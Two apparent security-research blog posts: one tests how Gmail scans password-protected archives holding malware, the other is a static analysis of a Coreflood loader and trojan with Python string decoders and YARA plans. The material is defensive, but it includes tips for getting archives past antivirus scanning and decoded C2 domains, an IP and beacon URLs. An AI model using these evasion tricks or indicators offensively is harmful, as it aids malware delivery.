
Is Google Scanning Malware Email Attachments Between Researchers?

Disclaimer: This post is based upon my experiences sending malware via GMail (Google Mail). I'm documenting them here for others to disprove, debate, confirm, or downplay in importance.

Update:

In the comments below, a member of Google's AntiVirus Infrastructure team provided insight into this issue: a third-party AV engine used by GMail was designed by its vendor to automatically open ZIP files with a password of 'infected'. I want to thank Google for their attention to the matter, as it shows that there was no ill intent or deliberate scanning.

Original Post:


As a professional malware analyst and security researcher, a sizable portion of my work is spent collaborating with other researchers over attack trends and tactics. If I hit a hurdle in my analysis, it's common to just send the binary sample to another researcher with an offset location and say "What does this mean to you?"

That was the case on Valentine's Day, 14 Feb 2014. While working on a malware static analysis blog post, to accompany my dynamic analysis blog post on the same sample, I reached out to a colleague to see if he had any advice on an easy way to write an IDAPython script (for IDA Pro) to decrypt a set of encrypted strings.

There is a simple, yet standard, practice for doing this type of exchange. Compress the malware sample within a ZIP file and give it a password of 'infected'. We know we're sending malware samples, but need to do it in a way that:

          a. an ordinary person cannot obtain the file and accidentally run it;
          b. an automated antivirus system cannot detect the malware and prevent it from being sent.

However, on that fateful day, the process broke down. Upon compressing a malware sample, password-protecting it, and attaching it to an email, I was stopped: GMail registered a Virus Alert on the attachment.

Stunned, I tried again and saw the same results. My first thought was that I had forgotten to password-protect the file. I erased the ZIP, recreated it, and received the same results. I tried with a different password - same results. I used a 24-character password... still flagged as malicious.

The instant implications of this initial test were staggering; was Google password cracking each and every ZIP file it received, and had the capability to do 24-character passwords?! No, but close.

Google already opens any standard ZIP file attached to an email. The ZIP contents are extracted and scanned for malware, and a detection will block the attachment. This is why we password-protect them. However, Google is now attempting to guess the password to ZIP files, using the password 'infected'. If it succeeds, it extracts the contents and scans them for malware.

Google is attempting to unzip password-protected archives by guessing at the passwords. To what extent? We don't know. But we can try to find out.

I obtained the list of the 25 most common passwords and integrated them (with 'infected') into a simple Python script below:


import subprocess

pws = ["123456", "password", "12345678", "qwerty", "abc123", "123456789", "111111",
       "1234567", "iloveyou", "adobe123", "123123", "sunshine", "1234567890", "letmein",
       "photoshop", "1234", "monkey", "shadow", "sunshine", "12345", "password1",
       "princess", "azerty", "trustno1", "000000", "infected"]

# create one password-protected ZIP per password, each containing the same sample
for pw in pws:
    cmdline = "7z a -p%s %s.zip malware.livebin" % (pw, pw)
    subprocess.call(cmdline, shell=True)

This script simply compressed a known malware sample (malware.livebin) into a ZIP of the same password name. I then repeated these steps to create respective 7zip archives.
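A minimal sketch of that repeat step, reusing the pws list from the script above (the -t7z and -mhe=on switches select 7-Zip's own container format and also encrypt the file names within it):

# same loop, but producing .7z archives instead of .zip
for pw in pws:
    cmdline = "7z a -t7z -mhe=on -p%s %s.7z malware.livebin" % (pw, pw)
    subprocess.call(cmdline, shell=True)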

I then created a new email and simply attached all of the files:


Of all the files created, all password-protected, and each containing the exact same malware, only the ZIP file with a password of 'infected' was scanned. This suggests that Google isn't using a sizable word list, but it is clear they are targeting the password 'infected'.

To compensate, researchers should now move to a new password scheme, or the use of 7zip archives instead of ZIP.

Further testing was performed to determine why subsequent files were flagged as malicious, even with a complex password. As soon as Google detects a malicious attachment, it will flag that attachment File Name and prevent your account from attaching any file with the same name for what appears to be five minutes. Therefore, even if I recreated infected.zip with a 50-char password, it would still be flagged. Even if I created infected.zip as an ASCII text document full of spaces, it would still be flagged.

In my layman experience, this is a very scary grey area for active monitoring of malware. In the realm of spear phishing it is common to password protect an email attachment (DOC/PDF/ZIP/EXE) and provide the password in the body to bypass AV scanners. However, I've never seen any attack foolish enough to use a red flag word like "infected", which would scare any common computer user away (... unless someone made a new game called Infected? ... or a malicious leaked album set from Infected Mushroom?)

Regardless of the email contents, if they are sent from one consenting adult to another, in a password-protected container, there is an expectation of privacy between the two that is violated upon attempting to guess passwords en masse.

And why is such activity targeted towards the malware community, who uses this process to help build defenses against such attacks?

Updates:
There was earlier speculation that the samples may have been automatically sent to VirusTotal for scanning. As shown in the comments below, Bernardo Quintero from VirusTotal has denied that this is occurring. I've removed the content from this post to avoid any future confusion.

Others have come forth to say that they've seen this behavior for some time. However, I've been able to happily send around files until late last week. This suggests that the feature is not evenly deployed to all GMail users.


Notes:

  • Emails were sent from my Google Apps account.
  • Tests were also made using non-descript filenames (a.txt).
  • Tests were made to alter the CRC32 hash within the ZIPs, and any other metadata that Google could target.
  • The password "infected" was not contained in the subject nor body during the process.

Malware with No Strings Attached Part 2 - Static Analysis

In the previous post I showed some dynamic analysis procedures for a variant of a trojan known to Symantec as Coreflood. Based on the dynamic analysis, we discovered that the analyzed sample contained very few strings of use. It decrypted an embedded executable, which was injected into memory for execution. It dropped an encrypted file to the hard drive, then downloaded a second-stage executable from the Internet. This downloaded file was then encrypted in what appeared to be a similar routine as the dropped file.

However, in the end, we still had many questions that couldn't be answered:

  • What is the encryption routine used for thr1.chm and mmc109.exe?
  • Why does the malware rename mmc109.exe to mmc61753109.exe?
  • Why does the malware first make a network connection to Adobe.com? What does that POST value mean?
  • Why does the initial loader contain so few strings?
These questions are best answered through static analysis. However, static analysis can be an extremely time-consuming activity. A full "deep dive" static analysis could take days, or even weeks, to fully document all functionality within a malware sample. Instead, this post will go through the process of a targeted static analysis. With the questions laid out here, we'll focus our static analysis solely on answering those questions, which will mean leaving many aspects of the malware undocumented.

Therefore, we need to focus on what questions can be answered within an hour or two of static analysis.

These questions mirror those asked during incident response work, where a malware analyst works in conjunction with forensic examiners and responders to help answer the really difficult questions: why certain indicators are seen, what they mean, and what other indicators may have been missed.

This also addresses inaccurate preconceptions from those outside the field. When I tell a client that a sample has encoded data and will take a bit longer, I immediately get pushback from those expecting that a simple routine will add 40+ hours of billable time. Likewise, if I say that a sample has a custom encryption routine, I often get pinged every hour asking why it's not decoded yet.

This post will show some of my personal workflow and mentality when trying to analyze malware, while trying to extract indicators to assist in an overall forensics examination or incident response. As I'm new to much in the RE world, having only learned through self-training and on-the-job work, I'd love any feedback for ways in which to speed up or better hone topics that I covered here.


First off, we'll be using IDA Pro in this post. IDA is a commercial tool that is used for in-depth static analysis. There is a free version of IDA available for download, though very outdated. The newest versions of IDA also have an optional decompiler, at an additional cost. For general use, however, the pay-to-play cost is out of reach of many reversing hobbyists.

Alternatively, there's Hopper - a commercial, but very inexpensive, static analysis tool. Hopper has a decompiler built in, but its feature set (and decompiler ability) lags greatly behind IDA.

For our purposes here, both are usable. I use IDA Pro at work and have a license for home, though the home one is limited to an older version. I also have a personal Hopper license to play with as needed. 

For simple static analysis, Hopper is all you need, as shown in the chart below. As the complexity of the samples increase, you may need to move to IDA Pro for its functionality (or use Hopper and take really good notes). To compare the differences, note the graphic below showing IDA Pro on the left, Hopper Decompiler on the right:



Now, let's get started with this sample from the earlier post. For the sake of this post, I will stick to IDA Pro.

Loader Analysis

In Part 1 of this post, we performed dynamic analysis on the sample and ultimately determined that the initial file was a memory loader for the actual Trojan. This creates the issue of two separate files that require analysis. We'll separate our analysis between the loader (here) and the trojan (farther down).

Before performing in-depth analysis, we need to do basic normalization of the file. This includes decoding any encoded strings, resolving any API calls, and generally getting all of the small hurdles out of the way.

Encoded Windows API 

Earlier string analysis showed a distinct lack of API calls. So, one of our first steps is to look for any traces of API resolution, typically in the form of API name strings being passed to GetProcAddress().

Looking at the initial start() routine, there are a few things that pop out. There's liberal use of global DWORD variables, seen as "dword_<address>". This is also one of Hopper's weak points: changing a global variable name in one routine does not carry over to others. IDA is better equipped to handle malware like this.



These global DWORDs are seen being used to store values and, near the bottom, called as APIs (call dword_40CAF0). From this we know there is some dynamic API resolution occurring within the code, but we still lack the strings from which those APIs could be resolved. If there is dynamic API resolution, it will occur very early in the runtime. So, let's step through the subroutines chronologically.

One of the first calls is to push a block of raw data (unk_40C8DC). This data appears as:




From the start of the data, down to the nulls at the end, this appears lightly encoded. 

Before handling that data, the code calls GetModuleHandleA("kernel32.dll") and places the result into dword_40CAAC. Name the DWORD with a description (kernel32_handle) and proceed. Now we see the unknown block of data being passed into sub_4012E0.


If we follow this data onward, we see it passed into sub_401200. The portion of this subroutine that decodes the block of data is shown below:




This routine steps through the data until the position (ebp+var_4) reaches 234 bytes, a number which coincidentally is the exact size of the data block. For each iteration, four bytes of data are extracted. The position offset is subtracted from the DWORD integer value of those four bytes, and then the hex value 0x85BA is subtracted as well. Being a Python person, I duplicated the process with:


import struct

data = open('api_data', 'rb').read()
result = ''
# walk the encoded block one DWORD at a time, reversing the encoding
for pos in range(0, 232, 4):
    temp = struct.unpack('l', data[pos:pos+4])[0]
    temp -= pos
    temp -= 0x85BA
    result += struct.pack('l', temp)
print result

Upon execution, this data decoded to a set of null-terminated strings:

ìetWindowsDirectoryA VirtualAlloc VirtualFree CreateFileA HeapAlloc GetProcessHeap VirtualProtect MapViewOfFileEx LoadLibraryA UnmapViewOfFile CreateFileMappingA CloseHandle GetProcAddress lstrcatA FindAtomA AddAtomA GetModuleHandle

We've found our API calls! The first one is off, likely due to the malware keeping the first byte back for inclusion later on. But, wait, there's more. In the IDA graph above there's a second set of instructions on the right side for '3etProcAddr'. Knowing our APIs, that should be GetProcAddress. A look at this code shows that it's basically doing a memcpy() of '3etProcAddr' into 0x40CB20. Immediately afterward are direct byte placements into specific offsets. Byte 0x40CB20 becomes 'G', which replaces the '3'. Bytes 0x40CB2B, 0x40CB2C, 0x40CB2D, and 0x40CB2E are set to 'e', 's', 's', and '\00' respectively. Knowing this, I rename &byte_40CB20 to a description 's_GetProcAddress' (s_ denoting a string).
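For illustration, a quick Python sketch of those fix-ups (the offsets in the comments are the addresses noted above, relative to the start of the buffer):

buf = bytearray('3etProcAddr' + '\x00' * 4)   # the memcpy()'d string at 0x40CB20
buf[0] = ord('G')                             # 0x40CB20: '3' -> 'G'
buf[11:15] = 'ess\x00'                        # 0x40CB2B - 0x40CB2E
print str(buf).rstrip('\x00')                 # GetProcAddress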

Immediately afterward we see the earlier named kernel32_handle passed into sub_401130. Delving in here, I see the presence of 's_GetProcAddress' from just above. Without going into more analysis, I can make a very good guess that this routine just resolves the API of GetProcAddress and returns it. Sure enough, in our decoding routine, I see the result placed into the global dword_40CAF0, which I now rename to 'api_GetProcAddress'. 

If I follow the references (XRefs) to api_GetProcAddress, I see a usage in a subroutine we haven't looked at yet, sub_401DF0. Going there, we find a very simple routine that decompiles to:



Ding! With that known, we can rename sub_401DF0() to ResolveAPI(), and see how it's used. (Astute analysts will realize there's something wrong here... we'll come back to that later)



API Assignments


When I work my way back to where this block of APIs is being used, I see this block of code that is best represented in decompiler view:



This is just a small segment of the overall routine, but it shows the parsed API strings being resolved. Each resolved API address (stored as a DWORD) is then placed into a sequential series of DWORDs starting at 0x40CAC0 (which I've named API_List). A separate global DWORD (named API_Counter) is used as an incremental counter to map each string to its DWORD slot.

When I view that list of DWORDs, starting at 0x40CAC0, I see a series of sequential global DWORDs just waiting to contain APIs:




Our first inclination would be to just go down the line and rename them all based upon our text API strings. This would be wrong :) Why? Take a careful look at the offsets, particularly those with an 'align 10h' by them. There are no DWORDs associated with those locations; the APIs are being resolved during runtime, but IDA is showing us that they are never actually in use. We can confirm the offsets and locations by viewing the results in a debugger.




So, by counting carefully, we can scratch off CreateFileA, lstrcatA, FindAtomA, and AddAtomA. When done, the list should look like this:


Some people may notice a small error in this setup. When resolving APIs, the malware tried to resolve the API of "ìetWindowsDirectoryA", which is obviously not valid. The first DWORD should be for GetWindowsDirectoryA(), but because of the corrupted first byte, it didn't resolve and appeared as four nulls in the debugger output above. Had it worked, my DWORD of API_List should have been GetWindowsDirectoryA.


Now, when we go back and look through the code, functionality will be much clearer.


IDA Pro Decompiler Errors


One of the hardest lessons to learn with IDA Pro is to never trust the decompiler. For really quick static analysis, it's a life saver. You can breeze through malware samples, quickly determining the overall functionality with ease. But, when it comes to the small intricacies there are usually errors in its output.  

This is apparent in this sample. In the earlier routine, where the resolved API calls are placed into a series of global DWORDs, the decompiled output appeared as:




However, at a glance, this doesn't make any sense. Why would a variable container hold the results of the same call over and over? How would a function that resolves an API take only the handle to kernel32.dll? 

The problem exists within the function named ResolveAPI():


However, when this function is decompiled, it appears as:





There's a massive difference in functionality. For one, the return block (disassembly view bottom right) references two function parameters (arg_0 and arg_4). But, the decompiler only registered one parameter. With this in mind, let's go up a routine and see how data is being passed in:



There are two pushes before the call: the expected kernel32_handle but also API string value. This changes the meaning completely and finally lets the code make sense.

Oh, and Hopper decompiled it just fine :)


At this point we've been able to answer one of our initial questions:
  • Why does the initial loader contain so few strings?
It's because the strings are custom encoded and are decoded at runtime.

Finding the Injected Executable


With the basic framework in place to determine functionality, we can now look for that injected executable that we suspected during dynamic analysis. One aspect that makes it pretty apparent is the large block of tan coloring in the navigation band. This refers to stored data within the file.

The most obvious way to see what's occurring is to go to the first byte of this block of data and xref from that to find where it's being used. In this case, there's one reference to it within the start() routine:





Following that reference we see a pretty large block of code dealing with it. I find it best to represent it as decompiled below, with my variable names already applied:





There is a lot of code here to do something very simple: copy the block of data to another memory space 100 bytes at a time. Then, once done, it calls XOR_decode():




Now, note that the code from the decompiled view doesn't actually send four-bytes at a time into XOR_decode(), even though it decodes by DWORDs. Instead, it sends in the current byte position (in increments of 4) and lets XOR_decode() reference the data by its global DWORD location (seen here as decoded_exe). What XOR_decode() does is add that passed position number to 0x85BC, then performs a 4-byte XOR against the current block of data.

Therefore, on the first round, the first four bytes will be XOR'd by 0x85BC. On the second, 0x85C0, then 0x85C4. When complete, you'll have a fully qualified executable (as seen by a debugger):
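As a sanity check, the same logic can be reproduced in Python. This is a minimal sketch, assuming the raw encoded block has been dumped from the binary to a file (the 'encoded_blob' and output file names are hypothetical):

import struct

data = open('encoded_blob', 'rb').read()
out = ''
# XOR each DWORD with 0x85BC plus its byte offset, mirroring XOR_decode()
for pos in range(0, len(data) & ~3, 4):
    dword = struct.unpack('<I', data[pos:pos+4])[0]
    out += struct.pack('<I', dword ^ (0x85BC + pos))
open('decoded_exe.bin', 'wb').write(out)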



If you dumped it here, or decoded it manually, you'll find it identical to the one that we already extracted in Part 1 using Volatility.


Injected Malware Analysis


With the functionality of the loader complete, we'll close it out and focus on the injected module. As before, this will be a very targeted bag and tag. We have some very specific questions we need answered, but first let's see if there is any groundwork that needs to be completed, such as encoded strings and API resolutions.


Encoded Strings


When we look through the strings of the binary, there are a number of very odd ones that stick out. They're referenced by the code and are likely encoded like the ones in the loader binary.



If I follow them back to see how they're used, some are used in a way that suggests they're regular strings. For example, one routine sends them into a subroutine that treats them as HTTP hosts. This suggests that the strings are replaced in-line during execution; the original string is overwritten by the decoded version. Following the string references, I finally see a routine that decodes them, shown in decompiled form below:



This routine takes the length of each string and sends it into a routine that I've already named XOR_decode(). XOR_decode() takes the string, the hardcoded value of 15 (0xF) and the length of the string. When viewing the decode routine, it's quite apparent that the 15 (0xF) is a key value and is used in the following loop:





There are a few odd things here. It looks like a basic FOR loop; ESI is incremented after each pass and compared against the string length to break out. I see a byte-by-byte XOR decoding, but there's a small twist: the ECX register is increased on every pass but, once it passes 3, it resets to 0.

The passed key (0xF) is placed into DL (EDX), then has CL (ECX) added to it. The resulting value is XOR'd against the respective byte. This literally just makes a rolling five-byte XOR key of 0x0F 0x10 0x11 0x12 0x13.

After finding the code references to XOR_decode(), we have another problem: the key value varies in some calls. If there are a lot of calls, and many variations on the key, we may have to write an IDA script to do this. To see how they're called, let's drop the ASM output to a text file and grep it to see what values are pushed into the routine:



>grep -B 5 "call.XOR_decode" injected.asm | grep "h$" | sort
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Eh
        push    0Fh
        push    0Fh
        push    0Fh

This is promising. There are roughly 14 total calls and most of them use the same key (0x0E). There will likely be more calls, as the key could've been placed into a reusable variable, but this is totally within the realm of doing it manually. To do this, I pulled the relevant strings out and wrote a Python script to do the conversion:



def decode(s, key):
    pos = 0
    result = ''
    # rolling XOR: key, key+1, ... key+4, then repeat
    for i in range(0, len(s)):
        result += chr(ord(s[i]) ^ (pos + key))
        if pos <= 3:
            pos += 1
        else:
            pos = 0
    return result

strings = [('nsrgandttzcub<p`}', 0xF),
           ('\x6A\x7C\x62\x7D\x63\x63\x7F\x7F\x75\x67\x21\x73\x7E\x7F', 0xF),
           ('\x6A\x64\x3C\x66\x61\x6A\x63\x7A\x73\x3D\x6C\x7F\x7C', 0xF),
           ('\x63\x65\x7D\x73\x7D\x68\x7F\x3F\x71\x7C\x62', 0xF),
           ('\x7D\x7B\x71\x3E\x79\x60\x60\x73\x7A\x3C\x7E\x67\x60', 0xE),
           ('<>"?#<;> #6!!%%', 0xE),
           ('\x64\x71\x63\x73\x74\x6E\x7E\x75\x73\x3D\x6C\x7F\x3F\x71\x70', 0xF),
           ('\x7B\x62\x22\x3D\x6B\x68\x71\x65\x77\x3D\x7F\x78\x61', 0xF),
           ('\x59\x66\x62\x74\x61\x66\x6E\x62\x2A\x7D\x63\x62\x46\x78\x77\x79\x34\x58\x45\x46\x5E\x2F\x51\x7F\x73\x62\x76\x6A\x2A\x46\x7C\x6E\x73\x74\x42\x62\x7A\x63\x22\x20\x35\x41\x75\x65\x65\x61\x7D\x7B\x31\x53\x60\x6E\x7C\x68\x68\x35\x47\x44\x45\x42\x2E\x5C\x7E\x78\x74\x35\x49\x79\x75\x76\x62\x6A\x62\x2A', 0xE),
           ('\x6F\x6B\x7F\x73\x77\x20\x6C\x7F\x7C\x29\x69\x6A\x7F\x3E\x62\x7C\x60\x74\x64\x71\x7A\x66\x74\x3F\x62\x66\x7F\x2B\x7A\x77\x7C\x61\x75\x7D\x21\x3C\x34\x65\x62\x77\x7C\x3C\x22\x2A\x65\x67\x61\x79\x7F\x77\x7A\x34\x65\x63\x7E\x63\x60\x7E\x2A\x5A\x5A\x5B\x40\x2A\x62\x6A\x6E\x64\x74\x3C\x6B\x34\x51\x41\x42\x4A\x4E\x44\x50\x29\x4F\x6B\x7F\x73\x77\x35\x7F\x7C\x64\x75\x7D\x34\x51\x75\x70\x5B\x7F\x74\x3F\x7E\x60\x64\x2B\x74\x6A\x7E\x63\x7F\x63\x77\x7C\x21\x75\x69\x77\x35\x67\x64\x65\x62\x34\x34\x74\x7E\x65\x60\x6A\x68\x74\x71\x35\x7A\x60\x75\x73\x7A\x6A\x7D\x74\x29\x76\x6B\x79\x74\x6A\x35\x77\x62\x74\x70\x61\x60\x64\x69\x29\x6A\x6A\x7C\x74\x66\x6B\x7F\x7C\x64\x75\x67\x61\x2B\x7D\x7D\x6F\x6B\x60\x7D\x67\x69\x66\x7E\x2B\x29\x5B\x7F\x74\x70\x66\x6B\x34\x45\x65\x7B\x62\x34\x45\x65\x7B\x62\x21\x75', 0xE),
           ('\x6F\x6B\x7F\x73\x77\x20\x6C\x7F\x7C', 0xE),
           ('\x63\x66\x73\x63\x7D\x7D\x60\x76\x65\x3C\x6D\x60\x7D', 0xE),
           ('\x7B\x7F\x74\x70\x66\x6B\x20\x76\x78\x7C\x6A\x7A\x60\x75\x73\x7A\x6A\x3E\x61\x7A\x7E', 0xE)]

for data, key in strings:
    decoded = decode(data, key)
    print "%s => %s" % (data[0:10], decoded)

Upon execution, the results are pretty telling:


>decode_strings.py
nsrgandttz=>accuratefiles.com
j|b}cc¦¦ug=>elsoplongt.com
jd<fajczs==>et-treska.com
ce}s}h¦?q|=>lulango.com
}{q>y``sz<=>sta/knock.php
<>"?#<;> #=>212.124.118.147
dqcstn~us==>karaganda.co.cc
{b"=khqew==>tr3/xgate.php
Yfbtafnb*}=>Wireshar;ommView;HTTPAnalyz;TracePlus32;NetworkAnalyz;HTTPSnif;Fiddler;
ok⌂sw l⌂|) =>adobe.com;geo/productid.php;kernel32;user32;wininet;urlmon;HTTP;pdate.e;APPDATA;Adobe;plugs;AdbUpd.lnk;explorer.exe;http:;downexec;updateme;xdiex;xrebootx;deleteplugin;loadplugin:;Update;Util;Util.e;
ok⌂sw l⌂|  =>adobe.com
cfsc}}`ve<=>microsoft.com
{⌂tpfk vx|=>update/findupdate.php

Alternatively, this could be done via an IDAPython script. However, I'm personally weak with such, especially when the strings are not pushed directly into the routine; they're assigned to a variable much earlier. I would love to learn how to write a script to do this, though.

At this point, many examiners would just leave these strings on a list to reference, or put them into the code as comments. However, I'm an old school patcher and prefer to replace the strings in the executable itself. As this is a byte-by-byte encoding routine, we can literally replace the encoded bytes with their decoded equivalents within the executable by using a hex editor.

Make a backup copy of the executable then edit the original to find/replace the encoded strings. When done, go to IDA and select File -> Load file -> Reload the input file.
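The find/replace itself can also be scripted. A minimal sketch, reusing the strings list and decode() function from above (the file names are hypothetical; since the XOR is byte-for-byte, the decoded strings are the same length and file offsets are preserved):

data = open('injected_backup.bin', 'rb').read()
for encoded, key in strings:
    data = data.replace(encoded, decode(encoded, key))
open('injected_patched.bin', 'wb').write(data)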

Now, once replaced, the before and after results are pretty awesome:


Before:



After:


As there are no other noticeable forms of obfuscation, we have our executable to a ready state to continue analysis and answer the questions.

One thing to note, as we'll see during analysis, is a rather interesting lookup function. The large decoded string "adobe.com;geo/productid.php..." is a series of configuration strings in one set. The sample has a basic lookup routine that is passed an integer number and retrieves that numbered item for use by whatever function needs it. This is just another form of obfuscation, but it also allows the configuration to be quickly swapped out when infecting different regions or targets with the same malware.
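In effect, the lookup behaves like indexing into a delimited list; a rough Python equivalent of the behavior described above (the function name is mine, not the malware's):

config = "adobe.com;geo/productid.php;kernel32;user32;wininet;urlmon;HTTP;pdate.e;APPDATA;Adobe;plugs;AdbUpd.lnk;explorer.exe;http:;downexec;updateme;xdiex;xrebootx;deleteplugin;loadplugin:;Update;Util;Util.e;".split(';')

def get_config_item(index):
    return config[index]

print get_config_item(0)   # adobe.com
print get_config_item(1)   # geo/productid.php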

Another similar configuration string was found with encoded values interspersed with normal text, resulting in the adobe.com, microsoft.com, and findupdate strings above. This string appeared, in full, as another series of configuration settings used by the malware:

sss:::adobe.com;;;microsoft.com;;;update/findupdate.php;;;6000;;;1;;;0;;;

Dropped / Renamed Files

  • What is the encryption routine used for thr1.chm and mmc109.exe?
To determine the structure of thr1.chm, let's first determine where it's written from the code. With a few simple string searches I found references to "thr1" and to ".chm". First, "thr1" appears in the context of:


The structure here, "shedexec:thr1:", and the earlier "shedscr:3:120 <url>" suggest that there's a configuration structure written into the malware with the 'exec' field being thr1. This string is passed into sub_4035F1 which does the following with it:


From these results (shown in decompiler output for brevity, and because it won't error out on this :)), we see that sub_4035F1 takes the "shedexec:thr1:" value and parses out the fields between colons. This value, "thr1", is then appended to a predefined path of %AppData%\Adobe\shed\ (which we saw in dynamic analysis) and further appended with the extension ".chm", making %AppData%\Adobe\shed\thr1.chm.

We see that unknown data is XOR encoded using the same routine as the strings, and a key of 0xE (14). There's no indication here what that data is, but since we have the file from dynamic analysis we can decode it to receive:

3 http://presentpie.vv.cc/showthread.php?t=332864

Interesting, as these values were also seen two screenshots up in reference to the C2 URL. The meaning of the number is unknown at this point, but we do have the URL that we saw during dynamic analysis AND we know the purpose of the thr1.chm file: to store the C2 beacon address.
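For anyone following along, decoding the dropped file is just a reuse of the earlier decode() routine with a key of 0xE (the file name is as captured during dynamic analysis):

print decode(open('thr1.chm', 'rb').read(), 0xE)
# 3 http://presentpie.vv.cc/showthread.php?t=332864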


  • Why does the malware rename mmc109.exe to mmc61753109.exe?

My first inclination is to search the strings for "mmc" or ".exe". Neither returned results. I then searched the entire binary for those strings in a hex editor; again, nothing. I then checked the import table and saw some interesting traits.

The sample uses CreateDirectoryW, CreateFileW, MoveFileW, and MoveFileExW. Not many samples exclusively use unicode (*W) calls. It's also interesting that both MoveFileW and MoveFileExW are in play, where the latter allows extra control over how files are moved. Typically a sample would just use the basic MoveFileW().


As I access each subroutine that called MoveFileW and MoveFileExW, I spot one that answers our question, shown decompiled below:




There's our "mmc" text, stored as Unicode. I was performing ASCII text searches before, so I missed the reference. To avoid missing this, in your IDA strings display, right click on any string and Setup -> Enable Unicode. However, you'd also need to lower your string length threshold accordingly, which means some strings may still be missed if they're extremely short.

Now, in this routine, I see a folder path being created; following the word_408CB8 back, I see it given the value of the folder %AppData%\Adobe. From there, "\mmc" is tacked on, then two strings are made from that.

String one becomes %AppData%\Adobe\mmc%d.exe, where %d is a number derived from __rdtsc():

v2 = __rdtsc();
v3 = (16807 * ((HIDWORD(v2) ^ v2) % 127773) - 2836 * ((HIDWORD(v2) ^ v2) / 127773)) % 100000 % 255;
v4 = lstrlenW(&FN_exe);
wsprintfW(&FN_exe + v4, L"%d", v3);

The second string becomes %AppData%\Adobe\mmc%d.txt where %d is a number retrieved from GetTickCount():

v5 = GetTickCount();
v6 = lstrlenW(&FN_txt);
wsprintfW(&FN_txt + v6, L"%d", v5);


There's where our file names originated.
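The .exe suffix is just a pseudo-random number derived from the timestamp counter. A minimal Python sketch of that math (the TSC value below is made up purely for illustration, and C's modulo differs from Python's for negative intermediate values):

tsc = 0x1234567890ABCDEF                      # hypothetical __rdtsc() value
seed = (tsc >> 32) ^ (tsc & 0xFFFFFFFF)       # HIDWORD(v2) ^ v2
num = (16807 * (seed % 127773) - 2836 * (seed / 127773)) % 100000 % 255
print r"%%AppData%%\Adobe\mmc%d.exe" % num    # e.g. mmc109.exe for the right seed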

If, upon execution, the mmc%d.exe already exists, then it is moved to its new mmc%d.txt name.

The rest of this function shows the malware trying to download a file from the configured URL, making sure it was saved correctly, then checking whether it has a valid PE header (begins with "MZ" and has "PE" at the right spot). If it doesn't, it XOR decodes the file with a key of 0xE and checks again. Worked? Great!
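That header check is simple enough to mirror in Python. A minimal sketch (the e_lfanew field at offset 0x3C points to the "PE" signature; the file name is the one seen in dynamic analysis, and decode() is reused from earlier):

import struct

def looks_like_pe(data):
    # "MZ" at offset 0, then follow e_lfanew (offset 0x3C) to the "PE" signature
    if len(data) < 0x40 or data[0:2] != 'MZ':
        return False
    e_lfanew = struct.unpack('<I', data[0x3C:0x40])[0]
    return data[e_lfanew:e_lfanew + 2] == 'PE'

payload = open('mmc109.exe', 'rb').read()
if not looks_like_pe(payload):
    payload = decode(payload, 0xE)   # XOR decode with 0xE and check again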

Analysis then shows that the .TXT file is a temporary storage location for the executable file. It's likely that this is to allow for updates: moving the current second stage to a backup file while downloading a new version. Another subroutine (sub_4038AC) shows similar functionality that suggests it is used for trojan updates; however, that subroutine creates a folder %AppData%\Adobe\mmc_install.

That should explain most of the file activity we saw during dynamic analysis. Now, onto other things.

Network Beacon Structure

  • Why does the malware first make a network connection to Adobe.com? What does that POST value mean?
During runtime we saw a POST request to www.adobe.com/geo/productid.php. This actual URL didn't exist on Adobe's site, and wasn't found in the loader, so where did it come from? And why was it sent?

Since we've already performed string decoding, we've seen these strings pop out at us already. Remember this string?

adobe.com;geo/productid.php;kernel32;user32;wininet;urlmon;HTTP;pdate.e;APPDATA;Adobe;plugs;AdbUpd.lnk;explorer.exe;http:;downexec;updateme;xdiex;xrebootx;deleteplugin;loadplugin:;Update;Util;Util.e;

Following the routines that query this string, I see the request made in the major downloader thread:



We see it retrieving the first item (configuration_string_0 = adobe.com) and the second (geo/productid.php). It then passes these to a function I've named SendFakePOST() for reasons that are clear below:




This routine takes the server name (cp) and URL (lpString2) and creates a fake HTTP request packet. This packet is then sent and any response is received with recv(). ... And then nothing. It returns and the malware continues on. This HTTP request has no impact on the operation of the malware. Or.. does it?

The payload of the packet is seen above as lpString. When we trace that back in the code, it's the result of a function I've named GetHardDriveInfo(), shown below:





This function has the role of collecting certain operating system information and constructing it into a string. My function name was a little short-sighted, but fits for now. This routine is basically creating a string of:

_%d_%d_%d

The first %d is the result of a specialized Windows OS checking routine, where a Windows XP system (Major 5, Minor 1) is given the number 6. This is a pretty generically written routine and doesn't need to be shown here.

The second value is the result of GetUserGeoID(), "244". Based on Microsoft's Yet Another Table Of Geo Lookups, this number corresponds to the United States.

The final number is an integer representation of your operating system's partition volume serial number. For example, my serial number is 56F2-F7D9 (as obtained by running 'dir'), which is 1458763737 as an integer. When checking with the network traffic from dynamic analysis, everything seems to line up:
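The conversion is just the hex serial read as a 32-bit integer:

>>> int("56F2F7D9", 16)
1458763737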



While the malware would transmit a beacon to this host, and disregard its response, this action was very critical. It was a first-stage beacon giving your operating system information to the C2 host. In this case, your external IP address, operating system, geographical location, and volume serial number. The last is important for the actor to key in on a unique system out of a set.

Why adobe.com? Obviously that wouldn't work as a real C2. The only obvious answers are that either there is a localized DNS spoof or the traffic is being sniffed on the local network.

Conclusions

When we started static analysis, we were given a clear set of questions to answer:



  • What is the encryption routine used for thr1.chm and mmc109.exe?
  • Why does the malware rename mmc109.exe to mmc61753109.exe?
  • Why does the malware first make a network connection to Adobe.com? What does that POST value mean?
  • Why does the initial loader contain so few strings?

We were able to go in with static analysis and target the answers to each of these. We know the purpose of the loader and how it encoded its strings. We know what encoding routine was used to encode files during dynamic analysis, and what they contained. We know the meaning of the network beacon to adobe.com and the importance of its numbers.

Now what do we do with this newfound knowledge? Write signatures! Preferably YARA rules, written to key on binary data. The challenge is that YARA rules are typically written for data-at-rest, so data found only within the injected executable has very little chance of ever being exposed on disk. So, we'll need to focus on unique aspects of the loader.
While I disdain YARA rules based upon ASCII strings, there are a handful of interesting ones: MlLrqtuhA3x0WmjwNM27 in reference to a registry key and "3etProcAddr" for GetProcAddress.

The most unique aspect, however, is the data and string decoding routines. The string decoding routine was based upon subtracting the byte position, and the number 0x85BA, from each DWORD. As this is a unique DWORD value, we can key in on that. Turn on the opcode bytes within IDA and examine the hex bytes:


.rdata:0040123A 81 EA BA 85 00 00                 sub     edx, 85BAh
.rdata:00401476 05 BC 85 00 00                    add     eax, 85BCh

In action, this set of rules would look similar to:

rule CoreFlood_ldr_strings
{
    meta:
        author = "Brian Baskin"
        date = "13 Feb 14"
